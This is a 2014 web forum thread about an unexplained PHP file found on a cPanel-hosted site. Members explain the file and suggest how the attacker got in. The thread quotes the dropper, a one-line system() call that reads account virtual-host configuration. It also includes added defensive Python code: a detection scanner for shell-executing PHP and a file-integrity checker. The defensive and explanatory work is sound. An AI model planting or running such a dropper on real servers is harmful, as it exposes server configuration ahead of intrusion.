Mysterious file on my server

7:51 am on Feb 20, 2014 (gmt 0)

5+ Year Member



Hello, yesterday a mysterious file appeared on my server - sadfsdfsdf.php. The host says they don't know anything about how it happened but I don't trust them because their customer service is really bad. The content of the file is:


<?PHP echo system('FILES=/var/cpanel/userdata/myusernamehere/*;for i in $FILES;do egrep "servername|documentroot" $i | awk \'{print $1,$2}\' | egrep "^servername|^documentroot";echo ;done'); ?>

Can anyone translate what this code means? Many thanks!
10:52 am on Feb 20, 2014 (gmt 0)

WebmasterWorld Administrator phranque is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



this script could be used to expose information about your web server configuration.

essentially it means - print out the first two fields of every row that contains "servername" or "documentroot" in any file in the /var/cpanel/userdata/myusernamehere/ directory.
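As an added illustration (not code from the thread or from cPanel), here is the kind of check a site owner could run over their own web root after finding a file like this: a small Python scanner that flags PHP files which hand a string to the operating system shell (system, exec, shell_exec, passthru, popen, proc_open, or the backtick operator) or that reference the /var/cpanel/userdata path the dropped file read. The sample files it scans are constructed inline for the demo; the account name ACCOUNT is a placeholder. A hit is a lead for manual review, not proof of compromise, since some legitimate scripts call these functions.

```python
import os
import re
import tempfile
from typing import Dict, List

# PHP functions that pass a string to the OS shell. Legitimate code may use
# some of them, so a match is a lead to review, not a verdict.
SHELL_FUNCS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open")

# Match a call such as `system(` or `shell_exec (`, case-insensitive like PHP.
# The lookbehind keeps the tail of a longer identifier (e.g. my_exec) from matching.
CALL_RE = re.compile(r"(?<![\w$])(" + "|".join(SHELL_FUNCS) + r")\s*\(", re.IGNORECASE)

# PHP's backtick operator also runs a shell command; a weak signal on its own.
BACKTICK_RE = re.compile(r"`[^`\n]{1,200}`")

# The dropped file read cPanel's per-account vhost data from this directory.
CPANEL_PATH_RE = re.compile(r"/var/cpanel/userdata", re.IGNORECASE)


def scan_php_source(source: str) -> List[str]:
    """Return the reasons a PHP source text looks like a command-execution dropper."""
    reasons = []
    funcs = sorted({m.group(1).lower() for m in CALL_RE.finditer(source)})
    if funcs:
        reasons.append("calls shell function(s): " + ", ".join(funcs))
    if BACKTICK_RE.search(source):
        reasons.append("contains backtick operator (shell execution in PHP)")
    if CPANEL_PATH_RE.search(source):
        reasons.append("references /var/cpanel/userdata (account configuration)")
    return reasons


def scan_php_tree(root: str) -> Dict[str, List[str]]:
    """Walk a web root; map each flagged PHP file (relative path) to its reasons."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                reasons = scan_php_source(fh.read())
            if reasons:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = reasons
    return findings


# Constructed sample files (not taken from the poster's server): a benign page,
# a dropper modelled on the one in the thread, a false-positive candidate whose
# function name merely ends in "exec", and a non-PHP file that must be skipped.
SAMPLES = {
    "index.php": "<?php echo '<h1>Hello</h1>'; ?>",
    "sadfsdfsdf.php": "<?PHP echo system('cat /var/cpanel/userdata/ACCOUNT/*'); ?>",
    "includes/util.php": "<?php function my_exec($x) { return strlen($x); } ?>",
    "assets/app.js": "exec('not php, ignored');",
}


def demo() -> Dict[str, List[str]]:
    """Write the constructed samples into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_php_tree(root)


if __name__ == "__main__":
    # Point scan_php_tree() at a real document root to review your own site.
    for path, reasons in sorted(demo().items()):
        print(path)
        for reason in reasons:
            print("  -", reason)
```

Only sadfsdfsdf.php is flagged in the demo: the shell-function regex ignores my_exec(), and non-PHP files are never read. On a real site, review each flagged file against what you uploaded yourself.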
11:16 am on Feb 20, 2014 (gmt 0)

5+ Year Member



Thanks. Is that something the server people put there and do not want to say they did? Or could it be a hack? If so, what benefit can a hacker get from this info?
10:45 pm on Feb 20, 2014 (gmt 0)

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time Top Contributors Of The Month



I can't imagine the server administrators asking for information that they already have. Unless they're testing code-- and they wouldn't do that on some random customer's site!

For the hacker it's a preliminary inquiry. The information itself may or may not be useful; what they really want to know is whether they're able to get the information in the first place.

Hacking comes in many forms. What you've got here is a two-step approach. First comes the data collection, like your file, or checking whether they're able to "PUT" a file. If the first test comes up positive, they'll be back for bigger and nastier ventures.

I assume you removed the file the instant you found it. Did it come back?
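The "did it come back?" question is easiest to answer with a file-integrity baseline. The following is an added example, not code from the thread: it hashes every file under a web root into a manifest, stores the manifest as JSON (ideally off the server, since an attacker who can write files can also edit a manifest kept beside them), and later diffs a fresh manifest against it to list files added, removed or modified. The demo builds a constructed site in a temporary directory, then simulates a dropped file and an edited page.

```python
import hashlib
import json
import os
import tempfile
from typing import Dict, List

Manifest = Dict[str, str]  # relative path -> SHA-256 hex digest


def hash_file(path: str) -> str:
    """SHA-256 of a file, read in chunks so large uploads do not load into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root: str) -> Manifest:
    """Hash every regular file under root, keyed by forward-slash relative path."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = hash_file(full)
    return manifest


def save_manifest(manifest: Manifest, path: str) -> None:
    """Persist the baseline as JSON; keep this copy somewhere the web server cannot write."""
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(manifest, fh, indent=2, sort_keys=True)


def load_manifest(path: str) -> Manifest:
    with open(path, "r", encoding="utf-8") as fh:
        return json.load(fh)


def diff_manifests(baseline: Manifest, current: Manifest) -> Dict[str, List[str]]:
    """Compare two manifests; returns sorted lists of added, removed and modified paths."""
    base_paths, cur_paths = set(baseline), set(current)
    return {
        "added": sorted(cur_paths - base_paths),
        "removed": sorted(base_paths - cur_paths),
        "modified": sorted(p for p in base_paths & cur_paths if baseline[p] != current[p]),
    }


def _write(root: str, rel: str, body: str) -> None:
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w", encoding="utf-8") as fh:
        fh.write(body)


def demo() -> Dict[str, List[str]]:
    """Baseline a constructed site, then simulate a dropped file and an edited page."""
    with tempfile.TemporaryDirectory() as work:
        site = os.path.join(work, "public_html")
        _write(site, "index.php", "<?php echo 'home'; ?>")
        _write(site, "css/style.css", "body { color: black; }")

        # Baseline taken while the site is known-good; stored outside the web root.
        baseline_path = os.path.join(work, "baseline.json")
        save_manifest(build_manifest(site), baseline_path)

        # Constructed changes: an unexpected PHP file appears and index.php is altered.
        _write(site, "sadfsdfsdf.php", "<?php /* constructed sample, not the real dropper */ ?>")
        _write(site, "index.php", "<?php echo 'home'; /* tampered */ ?>")

        return diff_manifests(load_manifest(baseline_path), build_manifest(site))


if __name__ == "__main__":
    # Run build_manifest() against your real document root once it is clean,
    # then re-run and diff on a schedule; any entry under "added" is worth a look.
    print(json.dumps(demo(), indent=2))
```

A scheduled re-run (cron on the host, or from your own machine over SFTP) turns a reappearing dropper into an alert instead of a chance discovery; the modified list also catches the quieter case where an existing page is edited rather than a new file dropped.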
12:20 am on Feb 21, 2014 (gmt 0)

WebmasterWorld Administrator phranque is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



Not only that, it tells the hacker you have a cPanel installation, which would allow them to take advantage of a potential cPanel vulnerability.
12:48 pm on Feb 21, 2014 (gmt 0)

5+ Year Member



Yes I removed the file and it did not come back. I also changed the password. But what else can I do to prevent further problems?
1:31 pm on Feb 21, 2014 (gmt 0)

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time Top Contributors Of The Month



The host says they don't know anything about how it happened but I don't trust them

:: twiddling thumbs ::
1:55 pm on Feb 21, 2014 (gmt 0)

5+ Year Member



Their exact reply was:

It is important to remember that when it comes to the security of your site, it is your responsibility to make sure that none of the files you upload can be hacked. The server is secure, and I assure you that is not how any hacker got in, if that is what happened. If they did get in, it was through your files that you uploaded. It is highly recommended that you determine if this file is intended or not, and then make sure that you always secure your files, to ensure that hackers are not able to break in through the files and upload malware. Thank you.
9:27 pm on Feb 21, 2014 (gmt 0)

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time Top Contributors Of The Month



They think it's your fault your site got hacked? Well, maybe if your FTP password is "password" and your username* is "user" ...


* Notice how in movies-- the ones where they get the password within three guesses-- they never, ever have to figure out the username first?
10:19 pm on Feb 21, 2014 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



I removed the file and it did not come back. I also changed the password. But what else can I do to prevent further problems?

Consider how they got your username and password in the first place.

One obvious possibility is a trojan on your computer.

...
10:22 pm on Feb 23, 2014 (gmt 0)

5+ Year Member



Consider how they got your username and password in the first place.
One obvious possibility is a trojan on your computer.

Another possibility is using the same username and password in many other sites, and one of them got cracked badly.
Jonesy